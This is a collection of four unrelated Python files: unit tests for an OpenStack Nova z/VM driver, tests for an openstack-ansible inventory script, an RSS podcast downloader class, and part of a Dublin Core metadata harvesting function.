self.flags(instance_name_template='abc%6d')
self.assertRaises(exception.ZVMDriverException,
self._driver._validate_options)
@mock.patch('nova.virt.zvm.guest.Guest.get_info')
def test_get_info(self, mock_get):
self._driver.get_info(self._instance)
mock_get.assert_called_once_with()
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_get_image_info_err(self, call):
res = {'overallRC': 500, 'errmsg': 'err', 'rc': 0, 'rs': 0}
call.side_effect = exception.ZVMConnectorError(res)
self.assertRaises(exception.ZVMConnectorError,
self._driver._get_image_info,
'context', 'image_meta_id', 'os_distro')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._import_spawn_image')
def test_private_get_image_info(self, image_import, call):
res = {'overallRC': 404, 'errmsg': 'err', 'rc': 0, 'rs': 0}
call_response = []
call_response.append(exception.ZVMConnectorError(results=res))
call_response.append([{'imagename': 'image-info'}])
call.side_effect = call_response
self._driver._get_image_info('context', 'image_meta_id', 'os_distro')
image_import.assert_called_once_with('context', 'image_meta_id',
'os_distro')
call.assert_has_calls(
[mock.call('image_query', imagename='image_meta_id')] * 2
)
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_get_image_info_exist(self, call):
call.return_value = [{'imagename': 'image-info'}]
res = self._driver._get_image_info('context', 'image_meta_id',
'os_distro')
call.assert_called_once_with('image_query', imagename='image_meta_id')
self.assertEqual('image-info', res)
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def _test_set_disk_list(self, call, has_get_root_units=False,
has_eph_disks=False):
disk_list = [{'is_boot_disk': True, 'size': '3g'}]
eph_disk_list = [{'format': u'ext3', 'size': '1g'},
{'format': u'ext3', 'size': '2g'}]
_inst = copy.deepcopy(self._instance)
_bdi = copy.deepcopy(self._block_device_info)
if has_get_root_units:
# overwrite
disk_list = [{'is_boot_disk': True, 'size': '3338'}]
call.return_value = '3338'
_inst['root_gb'] = 0
else:
_inst['root_gb'] = 3
if has_eph_disks:
disk_list += eph_disk_list
else:
_bdi['ephemerals'] = []
eph_disk_list = []
res1, res2 = self._driver._set_disk_list(_inst, self._image_meta.id,
_bdi)
if has_get_root_units:
call.assert_called_once_with('image_get_root_disk_size',
self._image_meta.id)
self.assertEqual(disk_list, res1)
self.assertEqual(eph_disk_list, res2)
def test_private_set_disk_list_simple(self):
self._test_set_disk_list()
def test_private_set_disk_list_with_eph_disks(self):
self._test_set_disk_list(has_eph_disks=True)
def test_private_set_disk_list_with_get_root_units(self):
self._test_set_disk_list(has_get_root_units=True)
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_setup_network(self, call):
inst_nets = []
_net = {'ip_addr': '192.168.0.100',
'gateway_addr': '192.168.0.1',
'cidr': '192.168.0.1/24',
'mac_addr': 'DE:AD:BE:EF:00:00',
'nic_id': None}
inst_nets.append(_net)
self._driver._setup_network('vm_name', 'os_distro',
self._network_info,
self._instance)
call.assert_called_once_with('guest_create_network_interface',
'vm_name', 'os_distro', inst_nets)
@mock.patch('nova.virt.images.fetch')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_import_spawn_image(self, call, fetch):
image_name = CONF.zvm.image_tmp_path + '/image_name'
image_url = "file://" + image_name
image_meta = {'os_version': 'os_version'}
with mock.patch('os.path.exists', side_effect=[False]):
self._driver._import_spawn_image(self._context, 'image_name',
'os_version')
fetch.assert_called_once_with(self._context, 'image_name',
image_name)
call.assert_called_once_with('image_import', 'image_name', image_url,
image_meta, remote_host='test@192.168.1.1')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_destroy(self, call, guest_exists):
guest_exists.return_value = True
self._driver.destroy(self._context, self._instance,
network_info=self._network_info)
call.assert_called_once_with('guest_delete', self._instance['name'])
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.compute.manager.ComputeVirtAPI.wait_for_instance_event')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._setup_network')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._set_disk_list')
@mock.patch('nova.virt.zvm.utils.generate_configdrive')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._get_image_info')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_spawn(self, call, get_image_info, gen_conf_file, set_disk_list,
setup_network, mock_wait, mock_exists):
_bdi = copy.copy(self._block_device_info)
get_image_info.return_value = 'image_name'
gen_conf_file.return_value = 'transportfiles'
set_disk_list.return_value = 'disk_list', 'eph_list'
mock_exists.return_value = False
self._driver.spawn(self._context, self._instance, self._image_meta,
injected_files=None, admin_password=None,
allocations=None, network_info=self._network_info,
block_device_info=_bdi)
gen_conf_file.assert_called_once_with(self._context, self._instance,
None, self._network_info, None)
get_image_info.assert_called_once_with(self._context,
self._image_meta.id,
self._image_meta.properties.os_distro)
set_disk_list.assert_called_once_with(self._instance, 'image_name',
_bdi)
setup_network.assert_called_once_with(self._instance.name,
self._image_meta.properties.os_distro,
self._network_info, self._instance)
call.assert_has_calls([
mock.call('guest_create', self._instance.name,
1, 1024, disk_list='disk_list'),
mock.call('guest_deploy', self._instance.name, 'image_name',
transportfiles='transportfiles',
remotehost='test@192.168.1.1'),
mock.call('guest_config_minidisks', self._instance.name,
'eph_list'),
mock.call('guest_start', self._instance.name)
])
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._get_image_info')
def test_spawn_image_no_distro_empty(self, get_image_info, mock_exists):
meta = {'status': 'active',
'deleted': False,
'properties': {'os_distro': ''},
'id': self._image_id,
'size': 465448142}
self._image_meta = objects.ImageMeta.from_dict(meta)
mock_exists.return_value = False
self.assertRaises(exception.InvalidInput, self._driver.spawn,
self._context, self._instance, self._image_meta,
injected_files=None, admin_password=None,
allocations=None, network_info=self._network_info,
block_device_info=None)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._get_image_info')
def test_spawn_image_no_distro_none(self, get_image_info, mock_exists):
meta = {'status': 'active',
'deleted': False,
'id': self._image_id,
'size': 465448142}
self._image_meta = objects.ImageMeta.from_dict(meta)
mock_exists.return_value = False
self.assertRaises(exception.InvalidInput, self._driver.spawn,
self._context, self._instance, self._image_meta,
injected_files=None, admin_password=None,
allocations=None, network_info=self._network_info,
block_device_info=None)
@mock.patch.object(six.moves.builtins, 'open')
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_snapshot(self, call, get_image_service, mock_open):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
call_resp = ['', {"os_version": "rhel7.2",
"dest_url": "file:///path/to/target"}, '']
call.side_effect = call_resp
new_image_meta = {
'is_public': False,
'status': 'active',
'properties': {
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': self._instance['project_id'],
'os_distro': call_resp[1]['os_version'],
'architecture': 's390x',
'hypervisor_type': 'zvm'
},
'disk_format': 'raw',
'container_format': 'bare',
}
image_path = os.path.join(os.path.normpath(
CONF.zvm.image_tmp_path), image_id)
dest_path = "file://" + image_path
self._driver.snapshot(self._context, self._instance, image_id,
self.mock_update_task_state)
get_image_service.assert_called_with(self._context, image_id)
mock_open.assert_called_once_with(image_path, 'r')
ret_file = mock_open.return_value.__enter__.return_value
image_service.update.assert_called_once_with(self._context,
image_id,
new_image_meta,
ret_file,
purge_props=False)
self.mock_update_task_state.assert_has_calls([
mock.call(task_state='image_pending_upload'),
mock.call(expected_state='image_pending_upload',
task_state='image_uploading')
])
call.assert_has_calls([
mock.call('guest_capture', self._instance.name, image_id),
mock.call('image_export', image_id, dest_path,
remote_host=mock.ANY),
mock.call('image_delete', image_id)
])
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_capture')
def test_snapshot_capture_fail(self, mock_capture, get_image_service):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
mock_capture.side_effect = exception.ZVMDriverException(error='error')
self.assertRaises(exception.ZVMDriverException, self._driver.snapshot,
self._context, self._instance, image_id,
self.mock_update_task_state)
self.mock_update_task_state.assert_called_once_with(
task_state='image_pending_upload')
image_service.delete.assert_called_once_with(self._context, image_id)
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_delete')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_export')
def test_snapshot_import_fail(self, mock_import, mock_delete,
call, get_image_service):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
mock_import.side_effect = exception.ZVMDriverException(error='error')
self.assertRaises(exception.ZVMDriverException, self._driver.snapshot,
self._context, self._instance, image_id,
self.mock_update_task_state)
self.mock_update_task_state.assert_called_once_with(
task_state='image_pending_upload')
get_image_service.assert_called_with(self._context, image_id)
call.assert_called_once_with('guest_capture',
self._instance.name, image_id)
mock_delete.assert_called_once_with(image_id)
image_service.delete.assert_called_once_with(self._context, image_id)
@mock.patch.object(six.moves.builtins, 'open')
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_delete')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_export')
def test_snapshot_update_fail(self, mock_import, mock_delete, call,
get_image_service, mock_open):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
image_service.update.side_effect = exception.ImageNotAuthorized(
image_id='dummy')
image_path = os.path.join(os.path.normpath(
CONF.zvm.image_tmp_path), image_id)
self.assertRaises(exception.ImageNotAuthorized, self._driver.snapshot,
self._context, self._instance, image_id,
self.mock_update_task_state)
mock_open.assert_called_once_with(image_path, 'r')
get_image_service.assert_called_with(self._context, image_id)
mock_delete.assert_called_once_with(image_id)
image_service.delete.assert_called_once_with(self._context, image_id)
self.mock_update_task_state.assert_has_calls([
mock.call(task_state='image_pending_upload'),
mock.call(expected_state='image_pending_upload',
task_state='image_uploading')
])
call.assert_called_once_with('guest_capture', self._instance.name,
image_id)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_start')
def test_guest_start(self, call):
self._driver.power_on(self._context, self._instance, None)
call.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_softstop')
def test_power_off(self, ipa):
self._driver.power_off(self._instance)
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_softstop')
def test_power_off_with_timeout_interval(self, ipa):
self._driver.power_off(self._instance, 60, 10)
ipa.assert_called_once_with(self._instance.name,
timeout=60, retry_interval=10)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_pause')
def test_pause(self, ipa):
self._driver.pause(self._instance)
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_unpause')
def test_unpause(self, ipa):
self._driver.unpause(self._instance)
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_reboot')
def test_reboot_soft(self, ipa):
self._driver.reboot(None, self._instance, None, 'SOFT')
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_reset')
def test_reboot_hard(self, ipa):
self._driver.reboot(None, self._instance, None, 'HARD')
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.list_names')
def test_instance_exists(self, mock_list):
mock_list.return_value = [self._instance.name.upper()]
# Create a new server which not in list_instances's output
another_instance = fake_instance.fake_instance_obj(self._context,
id=10)
self.assertTrue(self._driver.instance_exists(self._instance))
self.assertFalse(self._driver.instance_exists(another_instance))
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_get_console_output(self, call):
call.return_value = 'console output'
outputs = self._driver.get_console_output(None, self._instance)
call.assert_called_once_with('guest_get_console_output', 'abc00001')
self.assertEqual('console output', outputs)
|
|
#!/usr/bin/env python
import collections
import json
import os
from os import path
import subprocess
import sys
import unittest
import yaml
INV_DIR = 'playbooks/inventory'
SCRIPT_FILENAME = 'dynamic_inventory.py'
INV_SCRIPT = path.join(os.getcwd(), INV_DIR, SCRIPT_FILENAME)
sys.path.append(path.join(os.getcwd(), INV_DIR))
import dynamic_inventory as di
TARGET_DIR = path.join(os.getcwd(), 'tests', 'inventory')
USER_CONFIG_FILE = path.join(TARGET_DIR, "openstack_user_config.yml")
# These files will be placed in TARGET_DIR by INV_SCRIPT.
# They should be cleaned up between each test.
CLEANUP = [
'openstack_inventory.json',
'openstack_hostnames_ips.yml',
'backup_openstack_inventory.tar'
]
def cleanup():
for f_name in CLEANUP:
f_file = path.join(TARGET_DIR, f_name)
if os.path.exists(f_file):
os.remove(f_file)
def get_inventory():
"Return the inventory mapping in a dict."
try:
cmd = [INV_SCRIPT, '--config', TARGET_DIR]
inventory_string = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT
)
inventory = json.loads(inventory_string)
return inventory
finally:
# Remove the file system artifacts since we want to force fresh runs
cleanup()
class TestAnsibleInventoryFormatConstraints(unittest.TestCase):
inventory = None
expected_groups = [
'aio1_containers',
'all',
'all_containers',
'aodh_alarm_evaluator',
'aodh_alarm_notifier',
'aodh_all',
'aodh_api',
'aodh_container',
'aodh_listener',
'ceilometer_agent_central',
'ceilometer_agent_compute',
'ceilometer_agent_notification',
'ceilometer_all',
'ceilometer_api',
'ceilometer_api_container',
'ceilometer_collector',
'ceilometer_collector_container',
'cinder_all',
'cinder_api',
'cinder_api_container',
'cinder_backup',
'cinder_scheduler',
'cinder_scheduler_container',
'cinder_volume',
'cinder_volumes_container',
'compute_all',
'compute_containers',
'compute_hosts',
'galera',
'galera_all',
'galera_container',
'glance_all',
'glance_api',
'glance_container',
'glance_registry',
'haproxy',
'haproxy_all',
'haproxy_container',
'haproxy_containers',
'haproxy_hosts',
'heat_all',
'heat_api',
'heat_api_cfn',
'heat_api_cloudwatch',
'heat_apis_container',
'heat_engine',
'heat_engine_container',
'horizon',
'horizon_all',
'horizon_container',
'hosts',
'identity_all',
'identity_containers',
'identity_hosts',
'infra_containers',
'infra_hosts',
'ironic-server_hosts',
'ironic_conductor_container',
'ironic_api_container',
'ironic_conductor',
'ironic-infra_containers',
'ironic-infra_hosts',
'ironic_servers',
'ironic-server_containers',
'ironic_all',
'ironic_server',
'ironic_server_container',
'ironic_api',
'keystone',
'keystone_all',
'keystone_container',
'log_all',
'log_containers',
'log_hosts',
'memcached',
'memcached_all',
'memcached_container',
'metering-alarm_containers',
'metering-alarm_hosts',
'metering-compute_container',
'metering-compute_containers',
'metering-compute_hosts',
'metering-infra_containers',
'metering-infra_hosts',
'network_all',
'network_containers',
'network_hosts',
'neutron_agent',
'neutron_agents_container',
'neutron_all',
'neutron_dhcp_agent',
'neutron_l3_agent',
'neutron_lbaas_agent',
'neutron_linuxbridge_agent',
'neutron_metadata_agent',
'neutron_metering_agent',
'neutron_server',
'neutron_server_container',
'nova_all',
'nova_api_metadata',
'nova_api_metadata_container',
'nova_api_os_compute',
'nova_api_os_compute_container',
'nova_cert',
'nova_cert_container',
'nova_compute',
'nova_compute_container',
'nova_conductor',
'nova_conductor_container',
'nova_console',
'nova_console_container',
'nova_scheduler',
'nova_scheduler_container',
'os-infra_all',
'os-infra_containers',
'os-infra_hosts',
'pkg_repo',
'rabbit_mq_container',
'rabbitmq',
'rabbitmq_all',
'remote',
'remote_containers',
'repo-infra_all',
'repo-infra_containers',
'repo-infra_hosts',
'repo_all',
'repo_container',
'rsyslog',
'rsyslog_all',
'rsyslog_container',
'shared-infra_all',
'shared-infra_containers',
'shared-infra_hosts',
'storage-infra_all',
'storage-infra_containers',
'storage-infra_hosts',
'storage_all',
'storage_containers',
'storage_hosts',
'swift-proxy_containers',
'swift-proxy_hosts',
'swift-remote_containers',
'swift-remote_hosts',
'swift_acc',
'swift_acc_container',
'swift_all',
'swift_cont',
'swift_cont_container',
'swift_containers',
'swift_hosts',
'swift_obj',
'swift_obj_container',
'swift_proxy',
'swift_proxy_container',
'swift_remote',
'swift_remote_all',
'swift_remote_container',
'utility',
'utility_all',
'utility_container',
]
@classmethod
def setUpClass(cls):
cls.inventory = get_inventory()
def test_meta(self):
meta = self.inventory['_meta']
self.assertIsNotNone(meta, "_meta missing from inventory")
self.assertIsInstance(meta, dict, "_meta is not a dict")
def test_hostvars(self):
hostvars = self.inventory['_meta']['hostvars']
self.assertIsNotNone(hostvars, "hostvars missing from _meta")
self.assertIsInstance(hostvars, dict, "hostvars is not a dict")
def test_group_vars_all(self):
group_vars_all = self.inventory['all']
self.assertIsNotNone(group_vars_all,
"group vars all missing from inventory")
self.assertIsInstance(group_vars_all, dict,
"group vars all is not a dict")
the_vars = group_vars_all['vars']
self.assertIsNotNone(the_vars,
"vars missing from group vars all")
self.assertIsInstance(the_vars, dict,
"vars in group vars all is not a dict")
def test_expected_host_groups_present(self):
for group in self.expected_groups:
the_group = self.inventory[group]
self.assertIsNotNone(the_group,
"Required host group: %s is missing "
"from inventory" % group)
self.assertIsInstance(the_group, dict)
if group != 'all':
self.assertIn('hosts', the_group)
self.assertIsInstance(the_group['hosts'], list)
def test_only_expected_host_groups_present(self):
all_keys = list(self.expected_groups)
all_keys.append('_meta')
self.assertEqual(set(all_keys), set(self.inventory.keys()))
class TestUserConfiguration(unittest.TestCase):
def setUp(self):
self.longMessage = True
self.loaded_user_configuration = di.load_user_configuration(TARGET_DIR)
def test_loading_user_configuration(self):
"""Test that the user configuration can be loaded"""
self.assertIsInstance(self.loaded_user_configuration, dict)
class TestDuplicateIps(unittest.TestCase):
def setUp(self):
# Allow custom assertion errors.
self.longMessage = True
def test_duplicates(self):
"""Test that no duplicate IPs are made on any network."""
for i in xrange(0, 99):
inventory = get_inventory()
ips = collections.defaultdict(int)
hostvars = inventory['_meta']['hostvars']
for host, var_dict in hostvars.items():
nets = var_dict['container_networks']
for net, vals in nets.items():
if 'address' in vals.keys():
addr = vals['address']
ips[addr] += 1
self.assertEqual(1, ips[addr],
msg="IP %s duplicated." % addr)
class TestConfigChecks(unittest.TestCase):
def setUp(self):
self.user_defined_config = dict()
with open(USER_CONFIG_FILE, 'rb') as f:
self.user_defined_config.update(yaml.safe_load(f.read()) or {})
def setup_config_file(self, user_defined_config, key):
try:
if key in user_defined_config:
del user_defined_config[key]
elif key in user_defined_config['global_overrides']:
del user_defined_config['global_overrides'][key]
else:
raise KeyError("can't find specified key in user config")
finally:
# rename temporarily our user_config_file so we can use the new one
os.rename(USER_CONFIG_FILE, USER_CONFIG_FILE + ".tmp")
# Save new user_config_file
with open(USER_CONFIG_FILE, 'wb') as f:
f.write(yaml.dump(user_defined_config))
def test_provider_networks_check(self):
# create config file without provider networks
self.setup_config_file(self.user_defined_config, 'provider_networks')
# check if provider networks absence is Caught
with self.assertRaises(subprocess.CalledProcessError) as context:
get_inventory()
expectedLog = "provider networks can't be found under global_overrides"
self.assertTrue(expectedLog in context.exception.output)
def test_global_overrides_check(self):
# create config file without global_overrides
self.setup_config_file(self.user_defined_config, 'global_overrides')
# check if global_overrides absence is Caught
with self.assertRaises(subprocess.CalledProcessError) as context:
get_inventory()
expectedLog = "global_overrides can't be found in user config\n"
self.assertEqual(context.exception.output, expectedLog)
def tearDown(self):
# get back our initial user config file
os.remove(USER_CONFIG_FILE)
os.rename(USER_CONFIG_FILE + ".tmp", USER_CONFIG_FILE)
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import httplib
import os
import shutil
import socket
import urllib2
import xml.dom.minidom
from operator import itemgetter
from slugify import slugify
from code.db_handler import DbHandler
from code.settings import settings
from mailer import mail_updates
class RssHandler:
def __init__(self, feed=None, db=None):
"""
Setup the RSS handler.
:param feed: URL to the RSS feed
:param db: DB class object
"""
self.feed = feed
if db:
self.db = db
else:
self.db = DbHandler()
# Create the base DOWNLOAD_DIRECTORY as found in settings if it has not been created yet.
if not os.path.exists(settings.DOWNLOAD_DIRECTORY):
print "Podcast download directory is missing. Creating: '" + settings.DOWNLOAD_DIRECTORY + "'"
try:
os.mkdir(settings.DOWNLOAD_DIRECTORY)
print "Download directory '" + settings.DOWNLOAD_DIRECTORY + "' created"
except OSError:
exit("Could not create podcast download sub-directory!")
def subscribe(self):
"""
Subscribe to a podcast. Then download the first x number of episodes as defined in the settings.
"""
message = ""
data = self._open_data_source()
if data is None or not data:
exit("Not a valid XML file or URL feed!")
podcasts = self._iterate_feed(data)
if podcasts:
message += self._save_podcasts(podcasts)
message += self._delete_old_podcasts(podcasts[0]['dir'])
if self.db.has_mail_users():
mail_updates(message, self.db.get_mail_users())
print message
def unsubscribe(self):
"""
Delete a subscription. Remove it from the database and delete all podcasts the its dir.
"""
feed_name = self.db.get_name_from_feed(self.feed)
if feed_name is None or not feed_name:
exit("Feed does not exist in the database!")
else:
feed_name = slugify(feed_name)
channel_directory = settings.DOWNLOAD_DIRECTORY + os.sep + feed_name
self.db.delete_subscription(self.feed)
try:
shutil.rmtree(channel_directory)
except OSError:
print "Subscription directory has not been found - it might have been manually deleted"
print "Subscription '" + feed_name + "' removed"
def update(self):
"""
Update and loop through all subscriptions.
Then download the first x number of episodes as defined in the settings.
"""
message = ""
for sub in self.db.get_subscriptions():
channel_name = sub[0]
self.feed = sub[1]
data = self._open_data_source()
if data:
message += "Feed for subscription: '" + channel_name + "' is updating...\n"
podcasts = self._iterate_feed(data)
if podcasts:
message += self._save_podcasts(podcasts)
message += self._delete_old_podcasts(podcasts[0]['dir'])
else:
message += "No podcasts to update.\n"
if self.db.has_mail_users():
mail_updates(message, self.db.get_mail_users())
print message
def _iterate_feed(self, data):
last_ep_date = 0
podcasts = []
try:
xml_data = xml.dom.minidom.parse(data).getElementsByTagName('channel')[0]
channel_title = slugify(xml_data.getElementsByTagName('title')[0].firstChild.data)
# Build the channel dir and create it if it doesn't exist
channel_directory = settings.DOWNLOAD_DIRECTORY + os.sep + channel_title
if not os.path.exists(channel_directory):
os.makedirs(channel_directory)
# Fetch the last episode date, or
# Create a DB entry if the subscription doesn't exist
if self.db.does_sub_exist(self.feed):
last_ep_date = self.db.get_last_subscription_downloaded(self.feed)
else:
self.db.insert_subscription(channel_title, self.feed)
# Iterate though each item (podcast) in the xml_data
for item in xml_data.getElementsByTagName('item'):
# Get and convert the date of the current podcast
item_time = self._date_to_int(
item.getElementsByTagName('pubDate')[0].firstChild.data
)
# If current podcast date > the last episode date, and
# The number of podcasts from the settings > number of current podcasts downloaded
# Add the current podcast to the list
if item_time > last_ep_date and settings.NUMBER_OF_PODCASTS_TO_KEEP > len(podcasts):
podcasts.append({
'title': item.getElementsByTagName('title')[0].firstChild.data,
'file': item.getElementsByTagName('enclosure')[0].getAttribute('url'),
'dir': channel_directory,
'type': item.getElementsByTagName('enclosure')[0].getAttribute('type'),
'size': item.getElementsByTagName('enclosure')[0].getAttribute('length'),
'date': item_time
})
else:
break
except (TypeError, ValueError):
return "This item has a badly formatted date. Cannot download!"
except xml.parsers.expat.ExpatError:
return "ERROR - Malformed XML syntax in feed."
except UnicodeEncodeError:
return "ERROR - Unicode encoding error in string. Cannot convert to ASCII."
return podcasts
def _open_data_source(self):
"""
Try and open the feed (self.feed) as as declared in init or update.
:return: the data feed or None if there was a problem
"""
try:
response = urllib2.urlopen(self.feed)
except ValueError:
try:
response = open(self.feed, 'r')
except (ValueError, urllib2.URLError, httplib.IncompleteRead):
return None
if not response:
return response.read()
else:
return response
def _save_podcasts(self, podcasts):
"""
Given a list of podcasts, save the podcasts to the file system.
:param podcasts:
'title': title of the podcast,
'file': URL where the podcast can be downloaded,
'dir': The dir to save the podcast at,
'type': file type of the podcast,
'size': byte size of the podcast,
'date': date the podcast was uploaded
:return: Message to display to user.
"""
message = ""
extension_map = {
'video/quicktime': '.mp4',
'audio/mp4': '.mp4',
'video/mp4': '.mp4',
'video/mpeg': '.mpg',
'video/x-flv': '.flv',
'video/x-ms-wmv': '.wmv',
'video/webm': '.webm',
'audio/webm': '.webm',
'audio/mpeg': '.mp3',
'audio/ogg': '.ogg',
'video/ogg': '.ogg',
'audio/vorbis': '.ogg',
'audio/x-ms-wma': '.wma',
'audio/x-ms-wax': '.wma',
}
if podcasts:
# Sort the podcasts so the oldest one is saved first.
# This allows us to use the file system time for tracking which podcast is the oldest.
podcasts = sorted(podcasts, key=itemgetter('date'))
for podcast in podcasts:
# Get the file name (we don't use the path right now)
item_file_name = podcast['title']
# Limit the file name to onl the first 50 chars
if len(item_file_name) > 50:
item_file_name = item_file_name[:50]
# Build the local file
local_file = podcast['dir'] + os.sep + slugify(item_file_name)
# Make sure the file has the correct extension
if extension_map[podcast['type']]:
if not local_file.endswith(extension_map[podcast['type']]):
local_file += extension_map[podcast['type']]
# If the file isn't already there, try and save it
if not os.path.exists(local_file):
# TODO: This print will need to get removed at some point
# But its nice for CLI usage, so it can stay for now.
print "Downloading " + podcast['title']
try:
item_file = urllib2.urlopen(podcast['file'])
with open(local_file, 'wb') as output:
output.write(item_file.read())
message += "Downloaded Podcast: " + podcast['title'] + "\n"
except urllib2.URLError as e:
message += "ERROR - Could not write item to file: ", e
except socket.error as e:
message += "ERROR - Socket reset by peer: ", e
self.db.update_subscription(self.feed, podcasts[-1]['date'])
return message
def _delete_old_podcasts(self, channel_dir):
"""
Delete all old podcasts from a given dir. Following then NUMBER_OF_PODCASTS_TO_KEEP in settings.
:param channel_dir: The dir where the podcasts live
:return: Message to display to user.
"""
message = "Deleted Files: \n"
os.chdir(channel_dir)
files = sorted(os.listdir(os.getcwd()), key=os.path.getmtime)
if len(files) <= settings.NUMBER_OF_PODCASTS_TO_KEEP:
return "No files to delete"
for old_file in files[:len(files) - settings.NUMBER_OF_PODCASTS_TO_KEEP]:
os.remove(old_file)
message += old_file + "\n"
return message
def _date_to_int(self, date):
"""
Convert a date (%a, %d %b %Y %H:%M:%S) to an int
:param date: date
:return: seconds since epoch
"""
new_date = ""
split_array = date.split(' ')
for i in range(0, 5):
new_date += split_array[i] + " "
if new_date:
return int(datetime.datetime.strptime(new_date[:-1], "%a, %d %b %Y %H:%M:%S").strftime('%s'))
else:
return 0
def _int_to_date(self, date):
"""
Convert a int (seconds since epoch) to a date
:param date: seconds since epoch
:return: date
"""
return datetime.datetime.fromtimestamp(date).strftime("%a, %d %b %Y %H:%M:%S")
|
|
import re
import requests
from bs4 import BeautifulSoup
from pymods import OAIReader
# custom functions and variables
import assets
from citrus_config import VERBOSE
nameSpace_default = { None: '{http://www.loc.gov/mods/v3}',
'oai_dc': '{http://www.openarchives.org/OAI/2.0/oai_dc/}',
'dc': '{http://purl.org/dc/elements/1.1/}',
'mods': '{http://www.loc.gov/mods/v3}',
'dcterms': '{http://purl.org/dc/terms/}',
'xlink': '{http://www.w3.org/1999/xlink}',
'repox': '{http://repox.ist.utl.pt}',
'oai_qdc': '{http://worldcat.org/xmlschemas/qdc-1.0/}'}
dc = nameSpace_default['dc']
dcterms = nameSpace_default['dcterms']
IANA_type_list = []
IANA_XML = requests.get('http://www.iana.org/assignments/media-types/media-types.xml')
IANA_parsed = BeautifulSoup(IANA_XML.text, "lxml")
for type in IANA_parsed.find_all('file'):
IANA_type_list.append(type.text)
def FlaLD_DC(file_in, tn, dprovide, iprovide=None):
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_DC', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
continue
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
continue
except AttributeError:
pass
oai_id = record.oai_urn
if VERBOSE:
print(oai_id)
logger.debug(oai_id)
sourceResource = {}
# sourceResource.alternative
# sourceResource.collection
# sourceResource.contributor
if record.metadata.get_element('.//{0}contributor'.format(dc)):
sourceResource['contributor'] = [{"name": name}
for name in
record.metadata.get_element(
'.//{0}contributor'.format(dc),
delimiter=';')]
# sourceResource.creator
if record.metadata.get_element('.//{0}creator'.format(dc)):
sourceResource['creator'] = []
for name in record.metadata.get_element('.//{0}creator'.format(dc),
delimiter=';'):
# need to test for ( Contributor ) and ( contributor )
if (len(name) > 0) and ("ontributor )" not in name):
sourceResource['creator'].append({"name": name.strip(" ")})
elif "ontributor )" in name:
if 'contributor' not in sourceResource.keys():
sourceResource['contributor'] = []
sourceResource['contributor'].append({"name": name.strip(
" ").rstrip("( Contributor )").rstrip(
"( contributor )")})
else:
sourceResource['contributor'].append(
{"name": name.strip(" ").rstrip(
"( Contributor )").rstrip("( contributor )")})
# sourceResource.date
date = record.metadata.get_element('.//{0}date'.format(dc))
if date:
sourceResource['date'] = {"begin": date[0], "end": date[0], "displayDate": date[0]}
# sourceResource.description
if record.metadata.get_element('.//{0}description'.format(dc)):
sourceResource['description'] = record.metadata.get_element(
'.//{0}description'.format(dc), delimiter=';')
# sourceResource.extent
# sourceResource.format
if record.metadata.get_element('.//{0}format'.format(dc)):
sourceResource['format'] = record.metadata.get_element(
'.//{0}format'.format(dc))
